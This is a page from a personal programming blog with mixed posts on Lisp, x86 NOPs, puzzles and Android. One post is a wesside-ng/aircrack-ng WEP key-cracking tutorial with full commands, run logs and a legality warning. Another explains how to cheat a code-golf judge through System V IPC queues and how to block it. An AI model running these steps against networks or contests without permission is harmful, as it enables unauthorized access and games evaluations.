John Fremlin's blog

Operands to NOP on AMD64

Posted 2010-02-23 00:00:00 GMT

I was looking at a disassembly. It contained this

nopl   0x0(%rax)

What is the point of passing an operand to NOP? NOP is the instruction that does nothing. Yet not quite true: Intel's US Patent 5,701,442 Method of modifying an instruction set architecture of a computer processor to maintain backward compatibility suggests that they could opt to use more complex NOP instructions to provide hints like memory prefetch requests. On processors without the prefetch logic the operations would do nothing, but processors with prefetch would initiate memory requests to bring the data into cache. The extended NOPs taking operands that lie in the amd64 and x86 instruction sets are called hinting nops for this reason, but as far as I know they don't yet hint anything (see the PREFETCH instructions near the same opcode code points).

It turns out that these interesting nopls, nopw, etc. are generated by GAS (that is, when using GCC). As the instruction set is encoded in quite a uniform way to simplify the decode stage, there are many instructions that achieve nothing: for example, xchg %ax,%ax (the standard two-byte nop) or leal 0(%esi),%esi, a three-byte nop. Dedicating opcodes for longer NOPs is a sensible way to simplify the CPU's own optimizations.

Aligning jump targets in code to a 16-byte boundary to make sure that the target can be fetched in a single cacheline request is important. However the padding used to flow through to this aligned boundary should be as efficiently encoded as possible, and using only a single instruction to take up eight bytes — nopw 0L(%[re]ax,%[re]ax,1), is more efficient than repeatedly exercising the decode logic on eight one-byte nops. The code to do this is in binutils/gas/config/tc-i386.c:i386_align_code.

Goes to show how mature the AMD64 instruction set has become — and how far from the days of the Binary Coded Decimal nonsense.

Post a comment

K9Mail SSL client certificates and keys

Posted 2010-01-29 20:43:00 GMT

Finally broke down and replaced my utterly untrusty Nokia N95 — fantastic but unreliable hardware, reliably broken software — with an Android phone. It arrived yesterday. The first thing I discovered is that Android does support client SSL certificates with email (the N95 did . . .).

So I hacked up a patch for K9mail to include certificates actually in the source code. However, shouldn't be hard to modify it to store them on the SD-card or something.

Android development seems to be relatively painless compared to Symbian, and a league apart from the diabolically short-sighted Java MIDP — removing named constants from classes to save space? Aaaargh.

The thing which took longest was figuring out that I should use ddms debugger to see the full logs; the instructions on the wiki exclude logs emitted by K9 under not the k9 tag but the TrustManagerFactory tag.

Post a comment

ClozureCL HEAD bug with fasls vs. class finalization

Posted 2010-01-19 09:42:00 GMT

Investigated a great bug reported by Vikram Bhandoh on manardb under ClozureCL trunk.

Common Lisp implementations all(?) have a fasl (fast load) file format so you needn't recompile a source file from scratch if it has not changed. This generally has no effect on the program, but sometimes you run into problems like this message from SBCL for this short program: (funcall #.(lambda ()))

 Objects of type FUNCTION can't be
dumped into fasl files.  

That means there are restriction the sort of constants you can splice into the output of the reader with #. notation (see *read-eval*), and the output of macros. You can work round it in general by forcing the offending contents to be compiled each time the file is loaded. The types of objects that can be dumped vary for each Lisp (see the hyperspec section 3.2.4.1 Externalizable Objects — for example ClozureCL can dump functions).

In the case reported by Vikram, the problem was that when the FASL containing a manardb class definition is loaded, the existing metaclass instance is clobbered but does not lose its class-finalized-p status. As ASDF does compile-file and then loads the file, this happens in practice. It results in this error on manardb when running the test-suite:

Slot MANARDB::WRITER-FUNCTION is unbound in #<MM-EFFECTIVE-SLOT-DEFINITION for memory slot PACKAGE-NAME #x30200143716D>
   [Condition of type UNBOUND-SLOT]

One solution is simply to restart the Lisp image. As long as you just load the FASL once you will be fine. Another work-around would be to change ensure-finalize-inheritance to finalize-inheritance in the definition of defmmclass, so that finalize-inheritance is always called.

However, ClozureCL is generally very quick to resolve bugs and I've given them a simple testcase so this hopefully won't be a problem for long.

Post a comment

Dropping two bowling balls

Posted 2010-01-17 10:02:00 GMT

Suppose you have two bowling balls and a one-hundred storey building. For some reason you wish to discover the lowest floor you can throw the balls from to have them break. What is the maximum number of throws you need to determine this?

I came across this puzzle on Chung-chieh Shan's blog, who got it from Jesse Farmer who was posed it as an interview question. The answer surprised me and looking more closely into it, some beautiful number sequences are involved. The terrible bowling ball analogy conceals some pretty mathematics.

Once you have broken one ball by throwing it from floor i, you may need to test each floor one at a time from the lowest possible floor up to floor i-1. If you didn't break the first ball by throwing it from floor i, you can restrict your search to the floors above i.

Suppose that the balls could break when dropped from the ground floor, but will definitely break from the top floor. Counting the ground floor as 0, the answer lies in the range 0-99.

Let c(n,b) be the maximum number of throws you need to determine the minimal breaking floor given you have where n > 0 is the number of storeys to your building and b gt; 0 the number of balls. As argued above, c(n,1) = n and certainly c(0,b) = 0. Suppose you have multiple balls and throw one out of floor i, labelling the ground floor as floor zero. Either it broke, in which case you are reduced to the problem with i floors and b-1 balls, or you know that the minimal breaking floor is higher, and you are reduced to the problem with n-i-1 floors. So c(n,b) = 1+mini(max(c(i,b-1),c(n-i-1,b))).

I guess part of the motivation for this as an interview question was to check you knew dynamic programming. Chung-chieh Shan demonstrates some impenetrably concise Haskell, but I don't think it can be extended neatly to the two dimensional case (involving more balls). Maybe a more advanced Haskellian or Haskellite will enlighten me. . . Anyway here's my Lisp.

(defun c (n b)
  (let ((table (make-array (list (1+ n) b) 
			   :element-type 'fixnum 
			   :initial-element 0)))
    (macrolet ((cc (x y) `(aref table ,x (1- ,y))))
      (loop for n upto n do ;;; b = 1 case
	    (setf (cc n 1) n))
      (loop for b from 2 upto b do 
	    (loop for n from 1 upto n do 
		  (setf (cc n b)
			(1+
			 (loop for i below n 
			       minimizing 
			       (max 
				(cc i (1- b)) 
				(cc (- n i 1) b)))))))
      (values (cc n b) table))))

The shape of the answer is counter-intuitive to me, maybe partly because we are looking at a worst-case rather than average case. If you had an unlimited supply of balls then clearly the answer is ceiling(log2(n)) throws as you obtain only one bit of information from each throw. This easily bounds the number of balls to be considered.

However, what is the best floor to throw the first ball off when you have only two balls left? It turns out you often have quite a lot of choice. As the function c increases only slowly with n and is in integer increments, you have a fairly free reign as you drop the ball.

The step points where increasing the building by one storey costs another throw were the key for me to get to grips with the problem. By considering the inverse function, which turns out to be easy to calculate in the two ball case, we can readily arrive at a much cleaner solution.

Given c throws, how tall a building can you solve with certainty n(c,b)? First, in the one ball case you have to play safe so n(c,1)=c and trivially n(1,b)=1. Now for the induction step, considering throwing a ball out of floor i: if the ball does not break then you have eliminated i+1 floors, otherwise you are fine provided that you can solve the problem for i floors with your remaining balls and throws. Trivially, dropping back to the one ball case cannot make things better and eliminating more floors cannot make things worse and could be better, so in the two ball case the answer is easy: throw at level i = c-1. The throw eliminates c floors and resolves to n(c,2) = n(c-1,2)+c — that is, just a sum of the ball-breaking cases. We've found the triangular numbers, n(c,2) = c(c+1)/2!

This gives us a way to analytically calculate the inverse function we found before with dynamic programming: c = sqrt(2n + 1/4) - 1/2, but note that this is only true for the n at step points; at other ones the value given for c is not an integer and too low; so you must take the next highest integer. The function in Lisp is

(defun c2(n)
  (ceiling (- (sqrt (+ (* 2 n) 1/4) ) 1/2)))

I think that's much neater than using dynamic programming. However, extending to the multi-ball case is not tidy, as far as I can see.

PS. Now it seems that, reading their answers, Chung-chieh Shan and Jesse Parker came up with an uglier formula because they use a slightly different definition where they consider c(n=1) to be 0, not c(n=0) to be 0. I figure my way is prettier and a strong endorsement for numbering the ground floor as zero. . .

Post a comment

Let over Lambda by Doug Hoyte

Posted 2010-01-16 03:55:00 GMT

I've been meaning to write something about Let over Lambda for a while. This book is positioned as a sort of successor to On Lisp. Last year, I got in touch with the author, Doug Hoyte, because I was curious about his antiweb server. Doug generously gave me an access code for the book. I also ordered a hardcopy for work. Then yesterday, Hacker News (which has a giant soft spot for Lisp) was running a post by Jack Harper to the ever-interesting Lispworks mailing list, explaining why he wrote his fingerprint scanner's software with Lispworks, in which he heavily praises Let over Lambda.

Unfortunately, LoL doesn't really fit into an easy category. It's not a comprehensive hand-holding introductory text like Practical Common Lisp, and it doesn't stay aloof from practical issues like On Lisp. I'd say it's more a wide ranging collection of novel techniques for Common Lisp. Hoyte says the point ... is to expose you to ideas that you might otherwise never be exposed to. The book certainly succeeded with me. Some of the ideas I might disagree with, but they are generally thought-provoking.

An example is the defmacro! macro (a replacement for defmacro), which goes through and creates gensyms for all symbols used in its sub-lexical scope that start with "g!". It certainly is can be a bit tiresome continually predeclaring all the vars you use in your macro expansion with alexandria:with-gensyms, and that does introduce another level of indentation. On the other hand, do you want to deal with this kind of implicit variable creation? It violates the principle of least surprise. Debating the morality of end result, however, ignores that the journey to it was surprising and introduced a new idea. Arguing over whether or not to use a tool is only possible if you've heard of it and LoL introduces many original tools.

Sadly, only the weaker first chapters of the book are freely available, giving a wrong impression of the overall book (recently chapter five was opened). The later chapters introduce much more advanced concepts and are where the book really gets going. The discussion on sub-lexical scope (including the sublet macro) isn't anywhere else, as far as I know, and his sortf using Batcher's algorithm is thought-provoking.

While his Lisp fanaticism is ladled on rather thick, claiming e.g. no other language has the potential for secure software that lisp does, Hoyte isn't one of those ivory-tower pontificators who think that the compiler should magically transform their vague programs into efficient machine code. He shows several disassemblies and discusses how more complex features like keyword arguments are implemented in practice, and even touches very briefly on practical security (unfortunately, not addressing how to deal with heap and stack-overflows — but then again, nobody addresses how to deal with those).

In the posting that finally gave me the impetus to write this review, Jack Harper, who's been programming Lisp for decades, says about Let over Lambda, you end up with an enormously powerful set of programming tools unlike anything else out there. I find it difficult to unequivocally recommend the book, but that puts me into a quandary as the good bits are really excellent, and I'd like to encourage more people to read it. The flaws you can skim over. Let over Lambda introduces a unique and fresh approach. If you're already comfortable in Lisp or willing to put a fair amount of effort in, you should read this book.

I found the Let over Lambda fun, entertaining and often unexpected. I hope it will inspire you.

PS. For other opinions, see Vladimir Sedach's balanced review or Adam Petersen's more enthusiastic reception.

Post a comment

Better video thumbnails by facing the facts

Posted 2010-01-14 18:23:00 GMT

Today, I made a nasty little prototype program that generates thumbnails from videos by looking at the faces in them. I called it fumbnailer.

At the moment, it successfully hooks up ffmpeg to opencv, but nothing works very well. ffmpeg (even the development version) seems to utterly fail to seek in flv streams, even when given an exact byte offset to seek to, which is rather irritating. And opencv doesn't give a confidence score for finding a face, which results in the face detection thumbnail generally not including a good face.

fumbnailer implements a second thumbnail selection algorithm (mest), which simply returns the first of the pair of keyframes with the highest intervening datarate. This is supposed to be a proxy for discovering the scenes with the highest movement.

Yesterday, I submitted a patch for ffmpegthumbnailer, (to allow creating thumbnails the same size as the original video), which Dirk (the maintainer) kindly accepted. In the end however, I didn't base fumbnailer on it though, because of its (for my purposes) overly complicated design — adding a single command line option would require modifying about three files, for example. I wanted to bash something out that would let me quickly get feedback on a few ideas.

It seems that modern C++ with the auto keyword seems quite fun. Here's hoping lambdas make it into g++ soon!

Finding a good thumbnail from a video is a kind of trivial sounding problem that for some reason appeals to me. I'd like to develop the two current approaches until they demonstrate their potential (seem to sporadically make good results on the videos I tried — is this just me?), and try a few more ideas out — maybe quality of focus measures next?

Please suggest something radical!

Post a comment

Recover wifi WEP key with wesside-ng on Ubuntu karmic

Posted 2010-01-13 09:57:00 GMT

WEP encryption has been theoretically broken for years, but the attacks against it require that you capture a large number of data packets (maybe 25k for an example). Most wifi networks are generally quiet, so it's difficult to get these packets.

The wesside-ng tool from aircrack-ng introduces another attack which tricks the access point into generating lots of packets. So you needn't wait for ages before getting the key. Unfortunately, it takes a while to figure out how to use wesside-ng because there is no real documentation (as far as I know). So I'm writing this.

I've only cracked the keys of networks I had permission to use, and circumventing the WEP protection on an access point you're not allowed to use is illegal. Possibly even unsuccessfully running wesside-ng on it is illegal. Don't do it.

In these instructions, I assume you are using Ubuntu karmic. I also assume you have got rid of that arrogant pestilence that is NetworkManager. This program seems to think it is way more qualified than you to manage your connectivity. Show it who's boss (sudo apt-get purge network-manager).

First, install the program.

sudo apt-get install aircrack-ng

Second, restart your network driver by rmmod'ing it. I use the iwlagn module (Intel PRO/Wireless 4965). This is not strictly necessary, but given that the iwlagn driver still has an irritating tendency to hang and get stuck, I err on the side of unnecessary resets (you can see your module name with ls -l /sys/class/net/wlan0/device/driver/module). Anyway, to reset the iwlagn module

sudo rmmod iwlagn ; sudo modprobe iwlagn

Third, create the monitor interface.

$ sudo airmon-ng start wlan0
Interface	Chipset		Driver
wlan0		Intel 4965/5xxx	iwlagn - [phy7]
				(monitor mode enabled on mon0)

Fourth, clear away any info from runs against other access points.

$ rm -f wep.cap prga.log key.log

Finally, you are now ready to run wesside-ng. If you have many access points in range, you may want to specify the BSSID you want to attack with the -v switch (use sudo iwlist wlan0 scan to get BSSIDs).

$ sudo wesside-ng -k 10 -i mon0 
[08:39:15] Using mac 00:00:00:00:00:00
[08:39:15] Got 12 bytes of prga IV=(00:00:00) PRGA=FF FF FF FF FF FF FF FF FF FF FF FF 
[08:39:15] Looking for a victim...
[08:39:17] Found SSID(XXXXX) BSS=(FF:FF:FF:FF:FF:FF) chan=6
[08:39:17] Authenticated
[08:39:17] Associated (ID=2)
[08:41:12] Got ARP request from (FF:FF:FF:FF:FF:FF)
[08:49:41] Guessing PRGA a5 (IP byte=216)     
[08:49:41] Got deauth=2
[08:49:42] Authenticated a5 (IP byte=216)    
[08:49:42] Associated (ID=2)
[09:00:41] Guessing PRGA a5 (IP byte=216)    
[09:00:41] Got deauth=2
[09:00:42] Authenticated a5 (IP byte=216)    
[09:00:42] Associated (ID=2)
[09:02:33] Guessing PRGA a5 (IP byte=216)    
[09:02:33] Starting crack PID=14437
[09:02:33] KEY=(65:61:73:74:70)
Owned in 23.30 minutes
[09:02:33] Stopping crack PID=14437
[09:02:33] KEY=(65:61:73:74:70)
Owned in 23.30 minutes
[09:02:33] Dying...
[09:02:33] Dying...

Note that the key printed is not the key for the network. I tried this with two different access points and two different passphrases, and got this same key from wesside-ng. That's why I'm showing it here.

Run aircrack-ng by yourself on wep.cap

$ aircrack-ng wep.cap
It should say, "KEY FOUND!" and print the key.

Now I reset the wireless driver and go online (you might be able to get away without doing this, just sudo airmon-ng stop mon0 but I have little faith in the Intel driver). As usual, you may want to a scan before trying to associate.

$ sudo rmmod iwlagn ; sudo modprobe iwlagn
$ sudo ifconfig wlan0 up; sudo iwlist wlan0 scan
$ sudo iwconfig wlan0 essid NETWORKESSID key KEYFROMAIRCRACKNG
$ sudo dhclient wlan0

If it didn't work. To debug, check that wep.cap is large. In my limited experience 1MB-10MB is about what you need. If it is small, run wesside-ng again, checking that it is growing. Check dmesg to see if the driver has got stuck again, and if it has, rmmod and modprobe it.

Why did I use the undocumented -k10 switch? If you don't, you will probably get this irritating misspelled error message, unless the access point is very close.

[08:29:17] ERROR Max retransmists for (40 bytes):
FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF

The -k10 parameter to tells wesside-ng to resend packets ten times, instead of waiting for an Ack. Additionally, not specifying this means that the Intel driver is more likely to get wedged.

The downside to the -k switch is that it might make things slower if you are very close to the access point.

Have fun, don't rely on WEP for security and please don't hack other people's access points!

PS. Another debugging trick is to watch the traffic on mon0

$ sudo tcpdump -n -i mon0

This will stop flowing when the driver gets wedged.

Post a comment

Cheating at codegolf with System V IPC

Posted 2010-01-12 14:55:00 GMT

Codegolf is a about writing the shortest possible program for a task. Shinichiro Hamaji (Japanese) runs an excellent golf competition on golf.shinh.org. You can play in a very wide selection of languages, and the entries are generally extremely high quality. It's a good way to evaluate how well you've mastered a language.

I occasionally look in on it, and once was briefly the winner in Perl, before tybalt89 came along and beat me. I sweated for hours until I equalised his solution:

$/=<>;print y/*///5,"
"for<>

In fact I found the same solution as him. Several other people found it too but yibe achieved the same score another way:

#!perl -aln055
print@F/3if@F

Isn't perl fantastic?

You might imagine that codegolf has nothing to do with real world programming, which should be about readability, robustness and so on. Well, certainly there is no point stripping your real programs of all whitespace and comments, but if you think that's what codegolf is about then you are missing the point. It's like saying that being great at fifty metre rifle prone competitions is no use in a firefight. True it's not the same game, but I'd rather have a fifty metre champion on my side than someone picked randomly off the street. Many of the people playing on golf.shinh.org are absolutely first rate programmers by any metric. They're better programmers than me at any rate.

Codegolf requires you to look in a fresh way at the algorithms you are using. In my opinion, the C competition is especially fun, because you can get away with all sorts of hijinks exploiting the way the code maps to the underlying machine in a predictable way. For example, don't waste time declaring any buffer sizes, just assume there is enough space due to page boundaries. Don't pass arguments to functions, as the right value is in the right register anyway because it was the return value of another function. I think this solution by nn

main(_,s){for(;gets();)strpbrk(s,"DMOPW")+strlen(s)-6||puts();}

for finding anagrams is a good example. What is going on?! Surely puts takes an argument? And clearly it's not truly finding anagrams at all :-) After I got a good score on the perl count diamonds, I thought I would try my hand at the C competition but got nowhere. These guys are at another level.

I was talking to leonid on the IRC channel (one of the wizards at the ruby contests) and he explained that he sometimes repeatedly submits programs that have a low but non-zero probability of producing the correct output until they pass. Ingenious.

Now given that I am not good enough to compete but nonetheless love winning, I decided to cheat. The deadline for totients was coming up. Writing a file somewhere then reading it in with a later submission is apparently stopped, so I thought about the old security exploit trick of filling up memory with many copies of the solution in one submission then printing it out in another. Unfortunately, as far as I know, there is no way to read uninitialised memory under Linux without being root.

This was not going to fly. But what about my old favourite, System V IPC message queues? I used them in my init replacement called jinit because they don't need the filesystem, and in 2001, I wrote a Python interface to them. They allow you to pass datagrams between programs with permission checking. They're not too well known (and rather odd anyway) so maybe shinh hadn't closed off this loophole. . .

After a bit of fiddling I got a solution out that beat the best goruby program (for a total of 46 bytes)

a[];main(){msgrcv(msgget(8,0),a,a,0);puts(a);}

On AMD64, you can drop the trailing 0 arguments (I had to use gcc -m32 to test the 32-bit version locally). The queue was primed by this semi-compressed program (that could be improved in nearly every way) which actually calculates the totients (the function c(a,b) is true iff a and b are not coprime — for some reason I mistakenly estimated that subtraction would be shorter than implementing Euclid's algorithm normally, just change the - to a % for a major speedup; you can also eliminate the a>b check I think).

char msg[10000],*m=msg;
i,j,k;
c(a,b)
{
  if(b<2)return 1;
  return a-b&&(a>b?c(a-b,b):c(b,a));
}
t(a)
{
  j=0;
  for(i=a-1;i;i--)j+=c(a,i);
  m+=sprintf(m,"%d\n",j);
}
char buf[9990];
main()
{
  int q=msgget(8,01777);
  for(k=0;301>k;++k)t(k+10000);
  msgsnd(q,msg,m-msg-5,0);
}

Note that in the finest tradition of horrible hacks you have to change the -5 to -9 in order for it to work on 64 bit (the message length does not include the first word which is the message type).

The next best C program was 97 bytes by the mighty nn. This may not be a fair way to win, but dammit, it feels better than not winning at all.

PS. For shinh to stop this chicanery, disable the sysv ipc mechanism. For example,

echo 0|sudo tee /proc/sys/kernel/msgmax|sudo tee /proc/sys/kernel/msgmni

PPS. If you play codegolf, and I urge you to, don't forget to remove the newline at the end of your file (there is even a caddy to help with this sort of thing).

Don't say things like `echo 0|sudo tee /proc/sys/kernel/msgmax|sudo tee /proc/sys/kernel/msgmni`. It encourages copy-and-paste adminning, which both allows idiots to do things without learning, and is a potential security risk if an idiot were to copy and paste a command that rm'ed their box. Instead, just say which files to echo 0 into and let the user determine the exact command to use.

Also note you could save a byte by using `sudo echo 0>/proc/sys/kernel/msgmax;sudo echo 0>/proc/sys/kernel/msgmni`

Posted 2010-01-12 16:17:52 GMT by Anonymous

Thanks for the suggestion to save a byte Anonymous, that is always welcome.

However, unfortunately, sudo echo ... > redirect doesn't open redirect as root of course. Doh. That's the point of using tee.

I hope that the people reading this are more than capable of figuring out what to change. There are plenty more vars to fiddle with not just those I mentioned. See sysctl.conf.

Posted 2010-01-12 17:16:41 GMT by John Fremlin

Actually, if we're playing this game properly, I think echo 0 | sudo tee /proc/sys/kernel/msgmax /proc/sys/kernel/msgmni

Or even, cd /proc/sys/kernel/;echo 0|tee msgmax msgmni

Can anybody do better? :-)

Posted 2010-01-13 13:07:59 GMT by John Fremlin

Very interesting indeed, I might look into code golfs in the future.

Posted 2010-01-15 22:03:11 GMT by Henrik H

Interesting cheat. This article about codegolf http://www.perlmonks.org/?node_id=763105 describes a couple of other codegolf cheats. Keeping up with tybalt89 is impressive, as he is one of the all time golfing greats.

I don't agree with your assertion that "doing well at codegolf is a good way to evaluate how well you've mastered a language". I argued the opposite point of view in http://www.perlmonks.org/?node_id=761053 namely that it is possible to win at codegolf while being a relative language ignoramus by finding a good algorithm, and being tenacious and devious.

Posted 2010-01-17 00:02:29 GMT by eyepopslikeamosquito?

Thanks, that's a great article.

You're right that you can get a great golf solution without knowing a language well, but (provided you aren't doing an automatic search for a solution) you will spend a lot of time in the language documentation. This will hopefully indicate to you that you have not mastered it. In normal programming it is easier to stay in your comfort zone.

In fact, even if you know a language/library quite well, you are likely to spend a long time reading the manual trying to scrape an idea out something. For example, I was beaten by youz with http://golf.shinh.org/reveal.rb?Count+diamonds+level+2/youz_1254926721&l in Common Lisp. He used read-delimited-list -- I'd completely forgotten it existed (and such a long name in a code-golf, wow).

The surprising things you learn by playing golf help calibrate your estimate of the number of surprising things you still don't know about a language (i.e. your level of mastery).

Posted 2010-01-20 05:04:19 GMT by John Fremlin

Post a comment

manardb not borked

Posted 2010-01-11 07:15:00 GMT

manardb had a teething problem on release, because it depended on the mmap in the osicat library, which was broken, giving this error

The value -134328320 is not of type (UNSIGNED-BYTE 64).
   [Condition of type TYPE-ERROR]
Backtrace:
  0: (OSICAT-POSIX:MMAP #.(SB-SYS:INT-SAP #X00000000) 4096 3 1 4 0)
  1: (MANARDB::MTAGMAP-OPEN #<MANARDB::MTAGMAP >)[:EXTERNAL]
This small issue (of signedness) is fixed in the osicat Git HEAD, and I'd like to opine that osicat is a nice clean library that more people should use instead of doing their syscalls by hand.

Anyway, the tests all pass

CL-USER> (asdf:operate 'asdf:load-op 'manardb-test) (manardb.test:test-all-manardb)
................
#<test-run: 24 tests, 3421731 assertions, 0 failures (0 expected) in 61.84 sec>

Note that SBCL does not seem to support bound inline declarations (in contravention of the spec, unless I am misreading it), so it gives a style warning.

manardb/src/box.lisp:65:19:
  style-warning: undefined function: MANARDB::ELEM
This is quite harmless.

[manardb is a memory-mapped persistent database for Lisp. It has an extensive test suite and some documentation and is being used right now. Give it a shot!]

Post a comment

How to optimise Common Lisp under SBCL: don't profile (draft)

Posted 2010-01-10 14:55:00 GMT

Don't worry about performance, then profile and look at the hotspots, changing your algorithm or tweaking them. I hear variations of this frequently and I completely disagree if performance is actually important. However, in the case where you haven't any strong performance requirements, it might let you make your program faster without much effort.

Firstly, profilers (unless part of an emulator) tend to produce results that can be very misleading if you don't take into account how they work. SBCL's instrumentation profiler is particularly prone to this, and its statistical profiler shares issues with all statistical profilers.

Secondly, once you find out from the profile that function #'process-stuff is taking a lot of time you should figure out whether or not it is realistic to expect to make it much faster, before buckling down to do something about it (see planning). And profiles reports don't tell you directly that you are using the wrong datastructure, especially if you have inlined all the inefficient accesses to it.

I think it is better to plan a good architecture rather than try to catch impressive sounding speedups by tweaking hotspots. If you can make your program twice as fast, how much faster is it possible for it to go? How fast does it need to go? A profile report doesn't do much towards addressing these questions.

Imagine building a house and wanting to make it energy efficient. You could look at it through a supers-duper infrared camera, and then double glaze the windows where heat is leaking in or out. But seeing as you're building it from scratch, why not consider energy efficiency from the start? After you've built it, you shouldn't be able to see any heat disparities with your amazing camera. Analogously, the profile report should just be a way to check for performance bugs, not a starting point.

You should be able to figure out the algorithms and structures that are important for the performance of your program without the profiler. The profiler can help build evidence to support or disprove your hypotheses, but is no substitute for thinking about the performance problem holistically, and blind reliance on the profiler can lead to ignore important algorithmic and data-structural changes and even to fiddle with things that are utterly irrelevant.

In most Lisps, I like using the handy and portable time macro with benchmarks of small parts of a program. It generally gives a reasonable picture of the amount of processing time and amount of garbage generated.

Under SBCL, it reports cycle counts (from the RDTSC instruction), which are nice to see as they remind you how much processing your algorithm uses. However, modern processors have a constant frequency for this clock independently of the frequency at which the CPU cores may be clocked. Therefore if your CPU is scaling back to save power, your cycle counts will be not related to CPU cycles. The cycle counts are just a measure of elapsed wall-time in units (hopefully but not necessarily) of a processor cycle. That means, for example, that other applications running on the computer may affect the cycle count.

The run-time, gathered from getrusage, and GC statistics are for every thread in the Lisp process, not just the things you are running inside the time macro.

Running under SLIME, a constant stream of garbage is being generated in the SLIME thread, so don't worry about small amounts of garbage (measured in the "bytes consed" line), even if you think your program should generate no garbage.

CL-USER> (time (loop repeat 500000000))
under SLIME
Evaluation took:
  0.259 seconds of real time
  0.260000 seconds of total run time (0.260000 user, 0.000000 system)
  100.39% CPU
  466,290,369 processor cycles
  12,608 bytes consed
and at the console
Evaluation took:
  0.258 seconds of real time
  0.260000 seconds of total run time (0.260000 user, 0.000000 system)
  100.78% CPU
  463,174,965 processor cycles
  0 bytes consed

Note that using (time ...) has some measurable overhead, so repeat your benchmark in a loop inside (time ...) until it takes at least a significant fraction of a second, and the results seem stable.

In summary, the results are a rough guide, not a perfect cut-and-dried final answer, but I recommend using (time ...) to make experiments on the performance of components of your program and to measure the effectiveness of any optimisations you take. It is less intrusive than the profilers, much simpler and much less misleading.

To be continued . . . (some examples of the misleading results from the profilers).

Post a comment

More entries